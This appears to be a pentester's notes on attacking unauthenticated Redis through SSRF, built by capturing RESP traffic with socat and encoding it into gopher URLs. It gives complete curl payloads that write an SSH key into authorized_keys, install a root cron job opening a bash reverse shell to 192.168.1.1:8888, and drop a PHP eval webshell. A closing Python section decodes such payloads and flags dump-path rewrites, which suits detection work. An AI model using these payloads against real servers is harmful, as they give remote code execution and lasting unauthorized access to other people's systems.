Redis payload notes
How to capture the traffic
1. Install redis and socat
2. Start redis and use socat to forward the redis traffic so it can be observed
socat -v tcp-listen:4444,fork tcp-connect:127.0.0.1:6379
Then
redis-cli -p 4444
Enter the following commands (one per line)
flushall
config set dir /home/redis/.ssh/
config set dbfilename authorized_keys
set x "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHyhpFBTKSSVTH4fsbK9ThbE0+5cZbrHS62B2AwAqHJ9+Xwcifkm4rRGVp1PMewaE0GsbDdkdd3MNTiH2xuDdhqXvFgZNrBza4E50Az5kuiZJSuROajo+BkLIQIRTSuNoSQ13+5tjyuUyJH/rkulVKteA5bJm4nE9/k62F+v6DIBzTs48gQWIIoSo4eYp5P9YhT7+Jp/pQ8qK9kJ0OROC5s2Kwbvx0VveBEtiATlh3sNgxpitq1ZKSfoQxEDSoz0Yc/xYyS7ZdOy3iGuNmXWxYhzQh2TIyMrRF9kOoQt819VDdx9rFxKd4mo0wWHBPYqByxhElDrkVtvq0iTIEWiAJ www-data@20823789636d"
save
The captured traffic looks roughly like this (socat prints each CRLF as \r followed by a line break; ">" is client to server, "<" is the server reply)
*1\r $8\r flushall\r
< 2020/04/24 19:57:32.273053 length=5 from=0 to=4
+OK\r
> 2020/04/24 19:57:38.830175 length=58 from=18 to=75
*4\r $6\r config\r $3\r set\r $3\r dir\r $17\r /home/redis/.ssh/\r
< 2020/04/24 19:57:38.830886 length=5 from=5 to=9
+OK\r
> 2020/04/24 19:57:44.688296 length=64 from=76 to=139
*4\r $6\r config\r $3\r set\r $10\r dbfilename\r $15\r authorized_keys\r
< 2020/04/24 19:57:44.688847 length=5 from=10 to=14
+OK\r
> 2020/04/24 19:57:51.586985 length=430 from=140 to=569
*3\r $3\r set\r $1\r x\r $402\r ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHyhpFBTKSSVTH4fsbK9ThbE0+5cZbrHS62B2AwAqHJ9+Xwcifkm4rRGVp1PMewaE0GsbDdkdd3MNTiH2xuDdhqXvFgZNrBza4E50Az5kuiZJSuROajo+BkLIQIRTSuNoSQ13+5tjyuUyJH/rkulVKteA5bJm4nE9/k62F+v6DIBzTs48gQWIIoSo4eYp5P9YhT7+Jp/pQ8qK9kJ0OROC5s2Kwbvx0VveBEtiATlh3sNgxpitq1ZKSfoQxEDSoz0Yc/xYyS7ZdOy3iGuNmXWxYhzQh2TIyMrRF9kOoQt819VDdx9rFxKd4mo0wWHBPYqByxhElDrkVtvq0iTIEWiAJ www-data@20823789636d\r
< 2020/04/24 19:57:51.588584 length=5 from=15 to=19
+OK\r
> 2020/04/24 19:58:01.597515 length=14 from=570 to=583
*1\r $4\r save\r
< 2020/04/24 19:58:01.600311 length=5 from=20 to=24
+OK\r
3. Strip the socat headers and server replies, keeping only the client side; replace each line terminator \r\n with %0d%0a and each space with %20, which gives roughly the following format
*1%0d%0a$8%0d%0aflushall%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$17%0d%0a/home/redis/.ssh/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$15%0d%0aauthorized_keys%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0ax%0d%0a$402%0d%0assh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABAQDHyhpFBTKSSVTH4fsbK9ThbE0+5cZbrHS62B2AwAqHJ9+Xwcifkm4rRGVp1PMewaE0GsbDdkdd3MNTiH2xuDdhqXvFgZNrBza4E50Az5kuiZJSuROajo+BkLIQIRTSuNoSQ13+5tjyuUyJH/rkulVKteA5bJm4nE9/k62F+v6DIBzTs48gQWIIoSo4eYp5P9YhT7+Jp/pQ8qK9kJ0OROC5s2Kwbvx0VveBEtiATlh3sNgxpitq1ZKSfoQxEDSoz0Yc/xYyS7ZdOy3iGuNmXWxYhzQh2TIyMrRF9kOoQt819VDdx9rFxKd4mo0wWHBPYqByxhElDrkVtvq0iTIEWiAJ%20www-data@20823789636d%0d%0a*1%0d%0a$4%0d%0asave%0d%0a
4. Execute
curl -v "gopher://127.0.0.1:6379/*1%0d%0a$8%0d%0aflushall%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$17%0d%0a/home/redis/.ssh/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$15%0d%0aauthorized_keys%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0ax%0d%0a$402%0d%0assh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABAQDHyhpFBTKSSVTH4fsbK9ThbE0+5cZbrHS62B2AwAqHJ9+Xwcifkm4rRGVp1PMewaE0GsbDdkdd3MNTiH2xuDdhqXvFgZNrBza4E50Az5kuiZJSuROajo+BkLIQIRTSuNoSQ13+5tjyuUyJH/rkulVKteA5bJm4nE9/k62F+v6DIBzTs48gQWIIoSo4eYp5P9YhT7+Jp/pQ8qK9kJ0OROC5s2Kwbvx0VveBEtiATlh3sNgxpitq1ZKSfoQxEDSoz0Yc/xYyS7ZdOy3iGuNmXWxYhzQh2TIyMrRF9kOoQt819VDdx9rFxKd4mo0wWHBPYqByxhElDrkVtvq0iTIEWiAJ%20www-data@20823789636d%0d%0a*1%0d%0a$4%0d%0asave%0d%0a "
Writing a cron job
Command line
flushall
set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/8888 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
gopher
curl -v "gopher://127.0.0.1:6379/_*1%0d%0a\$8%0d%0aflushall%0d%0a*3%0d%0a\$3%0d%0aset%0d%0a\$1%0d%0a1%0d%0a\$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >&/dev/tcp/192.168.1.1/8888>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a\$6%0d%0aconfig%0d%0a\$3%0d%0aset%0d%0a\$3%0d%0adir%0d%0a\$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a\$6%0d%0aconfig%0d%0a\$3%0d%0aset%0d%0a\$10%0d%0adbfilename%0d%0a\$4%0d%0aroot%0d%0a*1%0d%0a\$4%0d%0asave%0d%0aquit%0d%0a"
Writing a webshell
Command line
flushall
set x "<?php eval($_POST[c]);?>"
config set dir /var/www/html
config set dbfilename shell.php
save
gopher
gopher://127.0.0.1:6379/_*1%0d%0a\$8%0d%0aflushall%0d%0a*3%0d%0a\$3%0d%0aset%0d%0a\$1%0d%0ax%0d%0a\$25%0d%0a%3C%3Fphp%20%40eval(%24_POST%5Bc%5D)%3B%3F%3E%0d%0a*4%0d%0a\$6%0d%0aconfig%0d%0a\$3%0d%0aset%0d%0a\$3%0d%0adir%0d%0a\$13%0d%0a/var/www/html%0d%0a*4%0d%0a\$6%0d%0aconfig%0d%0a\$3%0d%0aset%0d%0a\$10%0d%0adbfilename%0d%0a\$9%0d%0ashell.php%0d%0a*1%0d%0a\$4%0d%0asave%0d%0a
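All three payloads above share one shape: CONFIG SET dir / CONFIG SET dbfilename redirect the RDB dump, then SAVE writes it. As an added defender-side example (not part of these notes), the following Python decodes a percent-encoded gopher RESP stream of that form, as it might appear in a proxy or web-server log of an SSRF attempt, reconstructs the Redis commands, and reports the directory and filename a SAVE would write to. The sample payload and the function names are my own constructions.

```python
from urllib.parse import unquote_to_bytes

# Constructed sample in the gopher form shown above; the leading "_" is the
# gopher selector type and carries no RESP data.
SAMPLE = ("_*1%0d%0a$8%0d%0aflushall%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a"
          "$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$13%0d%0a/var/www/html%0d%0a"
          "*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a"
          "$9%0d%0ashell.php%0d%0a*1%0d%0a$4%0d%0asave%0d%0a")

def parse_resp(data: bytes) -> list:
    """Parse a stream of RESP arrays of bulk strings into a list of argv lists."""
    cmds, i = [], 0
    while i < len(data):
        if data[i:i + 1] != b"*":
            raise ValueError(f"expected '*' at offset {i}")
        nl = data.index(b"\r\n", i)
        argc, i = int(data[i + 1:nl]), nl + 2
        argv = []
        for _ in range(argc):
            if data[i:i + 1] != b"$":
                raise ValueError(f"expected '$' at offset {i}")
            nl = data.index(b"\r\n", i)
            n, i = int(data[i + 1:nl]), nl + 2
            argv.append(data[i:i + n])
            i += n
            if data[i:i + 2] != b"\r\n":  # declared length must match the payload
                raise ValueError(f"bulk length mismatch at offset {i}")
            i += 2
        cmds.append(argv)
    return cmds

def find_dump_write(cmds):
    """Return (dir, dbfilename) if a SAVE/BGSAVE follows a CONFIG SET of the dump path, else None."""
    d = fn = None
    for argv in cmds:
        up = [a.upper() for a in argv]
        if up[:2] == [b"CONFIG", b"SET"] and len(argv) == 4:
            if up[2] == b"DIR":
                d = argv[3]
            elif up[2] == b"DBFILENAME":
                fn = argv[3]
        elif up[:1] in ([b"SAVE"], [b"BGSAVE"]) and (d or fn):
            return d, fn
    return None

def scan_gopher_payload(encoded: str):
    """Decode a gopher-style percent-encoded payload and check for a dump write."""
    raw = unquote_to_bytes(encoded).removeprefix(b"_")  # drop the gopher type char
    return find_dump_write(parse_resp(raw))
```

A hit such as (b"/var/www/html", b"shell.php") is the signal to alert on; a plain GET/SET stream decodes cleanly and returns None.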